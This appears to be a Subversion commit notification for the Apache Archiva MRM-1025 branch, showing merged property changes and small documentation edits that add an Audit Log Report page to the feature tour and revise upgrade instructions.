archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataRepository.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/ (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/pom.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java (props changed) archiva/branches/MRM-1025/skin/src/main/resources/META-INF/maven/site.vm (props changed) archiva/branches/MRM-1025/skin/src/main/resources/css/maven-base.css (props changed) archiva/branches/MRM-1025/skin/src/main/resources/css/print.css (props changed) archiva/branches/MRM-1025/skin/src/main/resources/images/logos/ (props changed) Propchange: archiva/branches/MRM-1025/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements:723609-726925 /archiva/branches/archiva-struts2:699795-705848 /archiva/tags/archiva-1.3:898632 -/archiva/trunk:825850-899477 +/archiva/trunk:825850-909070 Modified: archiva/branches/MRM-1025/archiva-docs/src/site/apt/adminguide/upgrade.apt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-docs/src/site/apt/adminguide/upgrade.apt?rev=909202&r1=909201&r2=909202&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-docs/src/site/apt/adminguide/upgrade.apt (original) +++ archiva/branches/MRM-1025/archiva-docs/src/site/apt/adminguide/upgrade.apt Fri Feb 12 01:43:19 2010 @@ -19,8 +19,8 @@ Because of the changes in the search implementation starting in 1.2, a few additional steps need to be performed when upgrading Archiva from 1.1.x to 1.2.x. Since the format of the index has changed in 1.2.x, the old index directory (which is located at <<</path/to/repo/.index>>> by default) needs to be removed. And in order for the artifacts in the repository to be indexed again, the last modified date of the artifacts need to be updated. - To do this, you can force Archiva to scan all the artifacts by ticking the 'Process All Artifacts' checkbox then clicking the 'Scan Repository Now' - button in the Repositories page. Take note though that this feature is only available starting with version 1.2.3. Otherwise, you must execute + To do this, you can force Archiva to scan all the artifacts by ticking the <<<Process All Artifacts>>> checkbox then clicking the <<<Scan Repository Now>>> + button in the Repositories page. Take note though that this feature is only available starting with version 1.3. Otherwise, you must execute <<find [REPOSITORY_DIRECTORY_NAME] | xargs touch>> at the base directory where the repository resides and then force execute the repository scanning so that the new index will be generated. Modified: archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/index.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/index.xml?rev=909202&r1=909201&r2=909202&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/index.xml (original) +++ archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/index.xml Fri Feb 12 01:43:19 2010 @@ -92,9 +92,15 @@ </a> </td> <td> + <a href="audit-log.html"> + <img src="../images/tour/audit-log.png" width="150" height="93" style="border: 1px solid silver; margin-left: 0.25em; margin-bottom: 0.25em" alt="" /><br/> + 10. Audit Log Report + </a> + </td> + <td> <a href="maintenance.html"> <img src="../images/tour/maintenance.png" width="150" height="93" style="border: 1px solid silver; margin-left: 0.25em; margin-bottom: 0.25em" alt="" /><br/> - 10. Maintenance + 11. Maintenance </a> </td> </tr> Modified: archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/maintenance.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/maintenance.xml?rev=909202&r1=909201&r2=909202&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/maintenance.xml (original) +++ archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/maintenance.xml Fri Feb 12 01:43:19 2010 @@ -18,7 +18,7 @@ enable or disable these consumers. </p> <p> - <a href="reports.html">Previous: Integrity Reports</a> | + <a href="audit-log.html">Previous: Audit Log Report</a> | <strong>Maintenance</strong> | <a href="index.html">Next: Feature Tour</a> </p> Modified: archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/reports.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/reports.xml?rev=909202&r1=909201&r2=909202&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/reports.xml (original) +++ archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/reports.xml Fri Feb 12 01:43:19 2010 @@ -18,7 +18,7 @@ <p> <a href="security.html">Previous: Role-based Security</a> | <strong>Integrity Reports</strong> | - <a href="maintenance.html">Next: Maintenance</a> + <a href="audit-log.html">Next: Audit Log Report</a> </p> </div> </section> Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/BaseConsumer.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:898632 -/archiva/trunk/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository:686983-687034 